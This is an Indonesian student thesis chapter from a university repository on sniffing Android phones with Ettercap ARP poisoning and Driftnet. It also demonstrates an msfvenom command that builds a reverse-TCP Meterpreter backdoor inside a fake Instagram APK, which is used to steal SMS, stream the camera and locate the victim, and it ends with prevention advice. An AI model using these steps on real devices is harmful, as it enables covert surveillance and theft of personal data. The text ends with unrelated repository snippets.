• Tidak ada hasil yang ditemukan

Institutional Repository | Satya Wacana Christian University: Sniffing Android dalam Satu Jaringan dengan Menggunakan Kali Linux 2.0 dan Analisis Metode Penyerangannya

N/A
N/A
Protected

Academic year: 2018

Membagikan "Institutional Repository | Satya Wacana Christian University: Sniffing Android dalam Satu Jaringan dengan Menggunakan Kali Linux 2.0 dan Analisis Metode Penyerangannya"

Copied!
14
0
0

Teks penuh

(1)

18 4.1 Implementasi

Hasil implementasi dari percobaan penetrasi jaringan lokal yang dilakukan padapembuatan proyekkali ini dapat dilihat dari kesamaan data yang didapat oleh penyerang dan data yang sedang apada pada korban. Berikut adalah hasil karya dan hasil implementasi proyek.

4.1.1 Penyerangan dengan metode Sniffing

Proyek yang dilakukan oleh penulis menggunakan dua cara metode penyerangan, metode pertama dengan metode Sniffing metode yang menyerang korban tanpa diketahui oleh korban, penyerang menyadap data korban hanya dengan masuk kedalam jaringan yang sama, untuk lebih jelasnya dapat disimak urutan penyerangan yang dipaparkan gambar.4.1 dam gambar 4.2. beserta penjelasannya.

Langkah pertama dengan mencantumkan jaringan mana yang akan digunakan untuk melakukan sniffing,

(2)

Gambar 4.1 Tampilan Awal Ettercap

Langkah selanjutnya, memeindai pengguna yang ada dalam jaringan yang dimasukki korban seperti pada gambar 4.2, setelah memindai memasukkan IP gateway sebagai target pertama dan IP korban sebagai target kedua, selanjutnya dilakukan ARP Poisoning dengan

(3)

Gambar 4.2 Hasil memindai pengguna pada jaringan

Setelah melakukan langkah pada gambar 4.2 penyerang hanya dengan memnuka terminal dan menuliskan perintah :

Kode Program 1. Kode Program Untuk Menjalankan Drifnet

Yang berarti memerintahkan untuk membuka aplikasi Drifnet dengan acuan adapter wlan0 untuk melakukan Sniffing seperti pada gambar 4.3, maka akan muncul dialog disebelah Terminal yang menjadi hasil

Sniffing yang dilakukan. Gambar tersebut bisa disimpan pada komputer penyerang.

(4)

Gambar 4.3 Drifnet dijalanakan melalui terminal

4.1.2 Penyerangan dengan metode Backdoor

(5)

Gambar 4.4 Membuat Backdoor

Gambar 4.4 menunjukan proses pembuatan

Backdoor, dengan mengetikkan perintah:

Kode Program 2. Kode Program Untuk Membuat Backdoor

Perintah tersebut memerintahkan metasploit untuk membuat backdoor dengan payload android yang menggunakan cara reserve TCP, cara ini membuat penyerang memrintahkan korban agar memanggil di port yang telah ditentukan, jika perintah itu dieksekusi sehingga memicu celah terbuka dan dapat dimasukki oleh penyerang, LHOST pada perintah di atas mengacu pada IP yang didapat penyerang oleh penyerang dari jaringan yang didapati dan LPORT sesuai dengan kebutuhan, jika port yang digunakan diblokir oleh admin maka harus menggunakan port yang lain, dan perintah R> menunjukan dimana letak aplikasi yang akan disusupi

backdoor, yang nantinya akan ditanam ke sistem korban. Pada proyek kali ini aplikasi yang akan disisipi backdoor

bernama “Instagram” dengan format APK.

Setelah membuat celah yang akan ditanam dalam sistem korban langkah selanjutnya menanamkan ke dalam

Msfvenom -p android/meterpreter/reverse_tcp

LHOST=192.168.5.253 LPORT=4444 R>

(6)

sistem, jika sudah tertanam maka akan tidak terlihat dan hanya bisa dilihat pada menu pengaturan aplikasi korban, penanaman hanya seperti menginstal aplikasi biasa. Lihat gambar 4.5, aplikasi yang disisipi backdoor pada langkah sebelumnya (lihat gambar 4.4) bernama instagram denganf format APK.

Gambar 4.5 Celah dalam bentuk program siap dipasang

Setelah diinstal maka hanya dapat dilihat pada menu pengaturan Aplikasi sistem korban.

(7)

terpicu untuk terbuka dan penuerang bisa masuk, lihat gambar 4.6 dibawah ini.

Gambar 4.6 perintah membuka Metasploit

Setelah tebuka, maka akan muncul pada gambar 4.7 dengan ditandai terminal masuk ke metasploit.

Gambar 4.7 Terminal masuk ke metasploit

Jika sudah masuk, penyerang hanya memasukkan payload, lokal port, dan lokal host yang akan digunakan, lalu eksploit. Jika berhasil maka akan ada satu sesi yang terbuka. Lihat pada gambar 4.8.

Gambar 4.8 Langkah untuk memicu celah yang ditanam

(8)

dalam pemicu, lalu pada baris kedua menunjukan

payload yang digunakan, pada perintah ketiga menujukan Lokal host yang digunakan, dan pada perintah ke empat menunjukan lokal port yang digunakan, semua harus sama seperti pada langkah gambar 4.4. dan pada baris terakir, adalah perintah untuk eksekusi, gambar 4.8 menunjukan celah yang dibuka berhasil dimasuki penyerang, ini dapat dilihat dari kata “meterpreter session 1 opended” yang berarti penyerang

mendapatkan sesi untuk mengendalikan atau mencuri data.

4.2 Hasil Pengujian

Berdasarkan implementasi proyek ini, didapati hasil pengujian yang menunjukan keberhasilan akan penyerangan terhadap suatu sistem dalam jaringan lokal, penyerang dapat menyadap gambar yang sedang korban akses dan dapat mencuri data yang ada, lihat gambar 4.9 untuk hasil kesamaan gambar yang sedang diakses

(9)

Gambar 4.9 Kesamaan gambar yang sedang diakses

Gambar 4.9 menunjukan kesamaan gambar yang diakses oleh korban melalui aplikasi Instagram, dan pemyerang menyadap gambar korban melalui metode sniffing seperti yang dilakukan pada poin 4.1.1, hasil yang sama ini menunjukan keberhasilan penyerang menyadap gambar korban.

(10)

Kesamaan isi SMS yang dicuri oleh penyerang dan SMS yang ada pada korban menunjukan keberhasilan pencurian data yang dilakukan dengan metode backdoor, metode ini dapat melakukan beberapa kegiatan lain, seperti mengakses kamera secara langsung (streaming) tanpa diketahui oleh korban, seperti gambar 4.11.

Gambar 4.11 penyerang akses kamera korban

(11)

Gambar 4.12 Menu penyerangan

Gambar 4.12 menunjukan menu yang bisa dilakukan selain menggunakan kamera korban dan mencuri sms, penyerang dapat melakukan pengiriman SMS ke nomor tertentu, atau mencuri data panggilan yang dilakukan korban, atau penyerang mendapatkan lokasi dimana korban saat itu dengan menu

geolocate.

4.3Analisis Hasil Proyek

Penyerangan yang dilakukan pada proyek ini terbilang berhasil, penyerangan dapat terjadi dengan berbagai kemungkinan, penulis mendapati analisa sebagai berikut:

(12)

karena korban masuk kedalam jaringan hanya diidentifikasi sebagai pengguna biasa tanpa ada kecurigaan sebagai pengguna nakal, sniffing dilakukan dengan menggunakan cara menduplikasi

gateway korban pada jaringan dialihkan kepada IP penyerang, sehingga data yang diakses oleh korban otomatis masuk kepada penyerang, pemalsuan gateway itu dilakukan tanpa ada halangan, karena jaringan hanya memberi akses pada pengguna tanpa bisa membatasi kegiatan. Jika ada konfigurasi firewall pada router

pun juga sama hasilnya, penyerang masih dapat melakukan kegiatan sniffing dengan lancar tanpa ada gangguan.

Indikasi tersebut berarti tindakan untuk mencegah atau menghentikan sniffing hanya dengan membagi jaringan yang dipakai oleh pengguna biasa dan pengguna staff perusahaan jika itu dalam lingkup perusahaan, sehingga aman dari tindakan penyadapan dan tidak menimbulkan kecemasan akan khawatir akan disadap atau dicuri datanya.

(13)

Penyerangan dengan metode backdoor bisa dicegah dengan menggunakan program anti virus pada sistem korban, karena dalam penginstalan aplikasi terdapat sesuatu yang sekiranya membahayakan pengguna perangkat maka akan diperingatkan oleh anti virus akan bahaya jika menginstall aplikasi tersebut, jika tidak menggunakan anti virus, jangan root perangkat, karena dengan akses root akan membuat perangkat selalu menurut dengan pengguna apapun itu perintahnya, beda dengan perangkat yang belum diperbolehkan untuk hak akses root, biasanya perangkat yang belum di-root akan memiliki keraguan untuk menginstal aplikasi yang sekiranya membahayakan, ini otomatis akan membuat pengguna perangkat lebih aman, karena setiap sistem pasti memiliki model perlindungan standar yang dilakukan untuk melindungi penggunanya dari hal-hal yang tidak berkenan, paling tidak meminimalisir agar tidak terjadi sesuatu yang tidak baik.

(14)

tidak sengaja memasang aplikasi tersebut atau tidak tau aplikasi itu dan menurut untuk memasang aplikasi tersebut maka otomatis sistem pengguna akan membuka celah yang dapat dimasuki oleh penyerang. Karena metode penyerangan backdoor dapat dilakukan juga walau beda jaringan.

Gambar

gambar.4.1
Gambar 4.1 Tampilan Awal Ettercap
Gambar 4.2  Hasil memindai pengguna pada
Gambar 4.3 Drifnet dijalanakan melalui terminal
+7

Referensi

Dokumen terkait

Sehubungan dengan Surat Penawaran Saudara pada Paket Pekerjaan Pengadaan Alat-Alat Kesehatan Rumah Sakit Tahun Anggaran 2014, maka dengan ini kami mengundang Saudara

Based on the background of the issues that have been raised above, the issues that will be discussed in this research are concerning difficulties and barriers faced by students in

Berdasarkan hasil yang ada dalam analisis regresi linier berganda didapatkan bahwa dua indikator yaitu faktor lingkungan dan citra perguruan tinggi berpengaruh secara

Tujuan dari modifikasi pada perhitungan intensitas jejak Semut (no. 2) dan probabilitas pemilihan Kota berikutnya (no. 3) adalah untuk mempertahankan solusi yang

Keberadaan hutan kemiri pada saat ini merupakan bukti nyata bahwa petani sekitar hutan memiliki kemampuan yang dapat diandalkan dalam pengelolaan hutan kemiri, dengan kata

Pedoman ini diharapkan menjadi acuan bagi seluruh mahasiswa dan pembimbing di setiap Perguruan Tinggi yang akan mengikuti KPKM. Karya tulis yang dihasilkan akan disebarluaskan

Maksud dari penulisan Tugas Akhir ini adalah untuk mengidentifikasi dan menganalisa dampak dari keberadaan Metro Plaza yang akan didirikan sebagai pusat perdagangan dan

Dalam hal ini yang perlu diperhatikan oleh perusahaan untuk mempengaruhi pengambilan keputusan konsumen terhadap sepeda Wimcycle adalah: persepsi kualitas yaitu